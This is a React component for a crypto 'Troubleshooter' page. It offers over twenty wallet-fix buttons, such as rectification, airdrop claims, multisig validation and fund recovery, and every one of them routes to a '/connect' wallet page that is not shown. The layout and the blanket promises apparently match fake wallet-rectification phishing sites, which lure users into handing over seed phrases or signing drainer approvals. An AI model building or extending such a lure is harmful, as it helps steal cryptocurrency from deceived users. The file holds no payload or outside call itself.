// src/Pages/TroubleshooterPage.js
import React, { useRef } from 'react';
import { motion, useInView } from 'framer-motion';
import { Link, useNavigate } from 'react-router-dom';

const actions = [
  { title: 'SYNCHRONIZE', description: 'Click here to synchronize your wallet data across multiple chains and networks.' },
  { title: 'MIGRATION', description: 'Click here for migration or to resolve any migration related issues.' },
  { title: 'RECTIFICATION', description: 'Click here to rectify all strange wallet issues.' },
  { title: 'CLAIM', description: 'Click here to claim tokens or resolve any token claiming related issues.' },
  { title: 'SWAP', description: 'Click here to swap tokens or resolve issues related to token swap.' },
  { title: 'SLIPPAGE', description: 'Click here for slippage or transaction fee related issues.' },
  { title: 'CLAIM AIRDROP', description: 'Click here to claim airdrop or resolve errors encountered during airdrop claim.' },
  { title: 'STAKING', description: 'Click here to resolve issues encountered while staking/unstaking.' },
  { title: 'WHITELIST', description: 'Click here to whitelist your address or resolve whitelisting related error.' },
  { title: 'CROSS TRANSFER', description: 'Click here to resolve cross bridging errors encountered during cross transfer.' },
  { title: 'NFTs', description: 'Click here to resolve NFT related issues.' },
  { title: 'LOCKED ACCOUNT', description: 'Click here to resolve locked account or wallet stuck issues.' },
  { title: 'LOGIN ERROR', description: 'Click here to resolve errors encountered during login.' },
  { title: 'WALLET GLITCH', description: 'Click here to resolve wallet issues.' },
  { title: 'DEFI FARMING', description: 'Click here for DeFi or Commercial farming related issues.' },
  { title: 'VALIDATION', description: 'Click here to validate your wallet via Multisig.' },
  { title: 'TRANSACTION DELAY', description: 'Click here for any transaction related error.' },
  { title: 'MISSING/IRREGULAR BALANCE', description: 'Click here to recover lost or missing funds.' },
  { title: 'RECOVERY', description: 'Click here for wallet recovery.' },
  { title: 'BUY TOKEN/COIN', description: 'Click here to trade. Your account has to be marked as a trusted payment source to start trading.' },
  { title: 'EXCHANGE', description: 'Click here for token exchange or to resolve errors encountered during token exchange.' },
  { title: 'BRIDGING', description: 'Click here to bridge tokens or resolve bridging related issues.' },
];

// Card component to satisfy hooks rules
const TroubleshooterCard = ({ action, index, onClick }) => {
  const cardRef = useRef(null);
  const cardInView = useInView(cardRef, { once: true, amount: 0.1 });
  return (
    <motion.button
      ref={cardRef}
      initial={{ opacity: 0, y: 24, scale: 0.95 }}
      animate={cardInView ? { opacity: 1, y: 0, scale: 1 } : { opacity: 0, y: 24, scale: 0.95 }}
      transition={{ 
        type: 'spring', 
        stiffness: 140, 
        damping: 16, 
        delay: index * 0.03 
      }}
      whileHover={{ scale: 1.03, y: -6 }}
      whileTap={{ scale: 0.98 }}
      className="bg-[#24180e] p-4 sm:p-6 rounded-xl text-left hover:bg-[#2d2013] transition-all duration-300 border border-[#4a2f17]/40 shadow-[0_8px_20px_rgba(0,0,0,0.15)] hover:shadow-[0_12px_28px_rgba(146,64,14,0.2)]"
      onClick={onClick}
    >
      <h3 className="text-base sm:text-lg font-semibold mb-2 text-white">{action.title}</h3>
      <p className="text-xs sm:text-sm text-gray-400 leading-relaxed">{action.description}</p>
    </motion.button>
  );
};

const TroubleshooterPage = () => {
  const navigate = useNavigate();
  const headerRef = useRef(null);
  const headerInView = useInView(headerRef, { once: true, amount: 0.3 });

  const handleConnect = () => {
    window.scrollTo({ top: 0, left: 0, behavior: 'smooth' });
    navigate('/connect');
  };

  return (
    <div className="min-h-screen bg-[#1b130a] text-white">
      <div className="max-w-6xl mx-auto px-4 sm:px-6 md:px-8 py-8 sm:py-12">
        <motion.div 
          ref={headerRef}
          initial={{ opacity: 0, y: 30 }}
          animate={headerInView ? { opacity: 1, y: 0 } : { opacity: 0, y: 30 }}
          transition={{ duration: 0.6 }}
          className="flex flex-col sm:flex-row sm:items-center sm:justify-between gap-4 mb-8 sm:mb-12"
        >
          <h1 className="text-2xl sm:text-3xl md:text-4xl font-extrabold bg-gradient-to-r from-[#fde68a] via-[#a16207] to-white bg-clip-text text-transparent">
            Troubleshooter
          </h1>
          <motion.div
            whileHover={{ scale: 1.05 }}
            whileTap={{ scale: 0.95 }}
          >
            <Link 
              to="/connect" 
              onClick={(e) => {
                e.preventDefault();
                handleConnect();
              }}
              className="inline-block px-4 sm:px-6 py-2 sm:py-3 rounded-lg bg-gradient-to-r from-[#92400e] to-[#b45309] text-white font-semibold hover:from-[#a16207] hover:to-[#c2410c] text-sm sm:text-base transition-colors"
            >
              Connect Wallet
            </Link>
          </motion.div>
        </motion.div>
        <div className="grid grid-cols-1 sm:grid-cols-2 lg:grid-cols-3 gap-3 sm:gap-4">
          {actions.map((action, index) => (
            <TroubleshooterCard 
              key={action.title} 
              action={action} 
              index={index} 
              onClick={handleConnect}
            />
          ))}
        </div>
      </div>
    </div>
  );
};

export default TroubleshooterPage;


